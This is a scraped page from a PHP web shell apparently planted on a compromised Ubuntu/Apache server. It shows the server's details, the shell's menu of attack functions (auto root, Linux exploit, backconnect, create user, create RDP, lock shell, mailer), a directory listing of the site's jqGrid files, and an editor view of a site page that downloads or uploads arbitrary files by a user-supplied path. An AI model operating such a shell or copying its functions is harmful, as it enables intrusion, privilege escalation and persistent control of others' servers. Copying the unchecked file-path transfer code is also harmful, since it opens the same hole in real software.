Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.145.152.146
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sdu /
JQGrid3.5 /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
i18n
[ DIR ]
drwxr-xr-x
JsonXml.js
8.64
KB
-rwxr-xr-x
grid.base.js
67.8
KB
-rwxr-xr-x
grid.celledit.js
15.35
KB
-rwxr-xr-x
grid.common.js
16.74
KB
-rwxr-xr-x
grid.custom.js
23.58
KB
-rwxr-xr-x
grid.formedit.js
58.78
KB
-rwxr-xr-x
grid.import.js
6.95
KB
-rwxr-xr-x
grid.inlinedit.js
6.4
KB
-rwxr-xr-x
grid.loader.js
2.16
KB
-rwxr-xr-x
grid.postext.js
1.5
KB
-rwxr-xr-x
grid.setcolumns.js
5.22
KB
-rwxr-xr-x
grid.subgrid.js
7.89
KB
-rwxr-xr-x
grid.tbltogrid.js
2.75
KB
-rwxr-xr-x
grid.treegrid.js
12.22
KB
-rwxr-xr-x
index.js
1.84
KB
-rwxr-xr-x
index_old.html
4.54
KB
-rwxr-xr-x
install.txt
2.04
KB
-rwxr-xr-x
jqDnR.js
1.84
KB
-rwxr-xr-x
jqModal.js
3.32
KB
-rwxr-xr-x
jquery-1.3.2.js
117.84
KB
-rwxr-xr-x
jquery-1.3.2.min.js
55.91
KB
-rwxr-xr-x
jquery-ui-1.7.2.custom.min.js
188.23
KB
-rwxr-xr-x
jquery-ui-1.7.2.custom.min.js_...
3.57
KB
-rwxr-xr-x
jquery.fmatter.js
15.5
KB
-rwxr-xr-x
jquery.jqGrid.min.js
177.72
KB
-rwxr-xr-x
jquery.js
29.15
KB
-rwxr-xr-x
jquery.searchFilter.js
29.58
KB
-rwxr-xr-x
ui.core.js
13.61
KB
-rwxr-xr-x
ui.sortable.js
37.15
KB
-rwxr-xr-x
ui.tabs.js
18.62
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index_old.html
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta http-equiv="pragma" content="no-cache" /> <title></title> <!-- css files--> <link rel="shortcut icon" type="image/jpg" href="images/tarka_favicon.jpg" /> <link rel="stylesheet" type="text/css" href="../../JQGrid3.5/css/jquery-ui-1.7.2.custom.css" /> <!--javascript files--> <script type="text/javascript" src="../../JQGrid3.5/js/jquery-1.3.2.js"></script> <script type="text/javascript" src="../../js/MainPage.js"></script> <script> $host_url=$host_url.replace("app.php?a=",""); $host_url+="libs/adodb5/mysql_lib.php"; function downloadFileFromServerOld() { if( trim(document.getElementById('download_upload_path').value) == '' ) { alert('Please Enter the Path.'); document.getElementById('download_upload_path').focus(); return; } else { window.location.href=$host_url+"?a=downloadFileFromServer&download_file_path="+$("#download_upload_path").val(); } } function UploadFileToServerOld() { if( trim(document.getElementById('upload_to_server_file_name').value) == '' ) { alert('Please Enter the File Path.'); document.getElementById('upload_to_server_file_name').focus(); return; } else { ext = document.getElementById('upload_to_server_file_name').value; filepath = ext; ext = ext.substring(ext.length-3,ext.length); ext = ext.toLowerCase(); if(ext != "") { document.getElementById('form_upload_download_details').action = $host_url+"?a=UploadFileToServer&filepath="+filepath+"&storage_path="+$("#download_upload_file_path").val(); document.getElementById('form_upload_download_details').target='_new'; // document.getElementById('form_module_details_upload').target='report_display'; document.getElementById('form_upload_download_details').submit(); } else { alert("Please select a File"); } } } </script> </head> <body> <div id='tabs'> <ul> <li><a href='#execute_query_div'>Download/Upload</a></li> </ul> <div align="center" id="download_upload_div"> <div style="height:20px;"></div> <div class='ui-tabs ui-widget ui-widget-content ui-corner-all' align='center' style='padding-top:2px; height:150px;'> <div class='ui-widget-header ui-corner-all sub-tab-header' align='left' style='font-size:1.4em;height:15px;padding:2px;'> Download</div> <div align="center" style="padding-top:15px"> <table id ="tbl_menu" class="content-tbl" align="center" cellpadding="2" cellspacing="0" border="0" style="width:47%"> <tr> <td align='right'><font color="red">* </font>Path:</td> <td><input type="text" id="download_upload_path" style='width:190px;' name="download_upload_path"/> </td> </tr> <tr> <td> </td> <td> <a href="#" id='download' class='anchor-header-footer' onclick='downloadFileFromServerOld()' style="color:#2B65EC; font-family:Verdana,Arial,Helvetica,sans-serif; font-size:11px; font-weight:bold;cursor:pointer;text-decoration: none;">Download</a> </td> </tr> </table> </div> </div> <div class='ui-tabs ui-widget ui-widget-content ui-corner-all' align='center' style='padding-top:2px; height:150px;'> <div class='ui-widget-header ui-corner-all sub-tab-header' align='left' style='font-size:1.4em;height:15px;padding:2px;'> Upload</div> <form id='form_upload_download_details' enctype='multipart/form-data' method='POST'> <div align="center" id="upload_details" style="padding-top:15px"> <input type='hidden' name= 'MAX_FILE_SIZE' value='10000000000' /> <table id ="tbl_menu" class="content-tbl" align="center" cellpadding="2" cellspacing="0" border="0" style="width:60%"> <tr> <td align='right'>File Name:</td> <td><input type="file" style='height:23px' id="upload_to_server_file_name" style='width:190px;' name="upload_to_server_file_name"/> </td> </tr> <tr> <td align='right'><font color="red">* </font>File Path:</td> <td><input type="text" id="download_upload_file_path" style='width:190px;' name="download_upload_file_path"/> </td> </tr> <tr> <td> </td> <td> <a href="#" id='upload' onclick='UploadFileToServerOld()' style="color:#2B65EC; font-family:Verdana,Arial,Helvetica,sans-serif; font-size:11px; font-weight:bold;cursor:pointer;text-decoration: none;">Upload</a> </td> </tr> </table> </form> </div> </div> </div> </body>
Close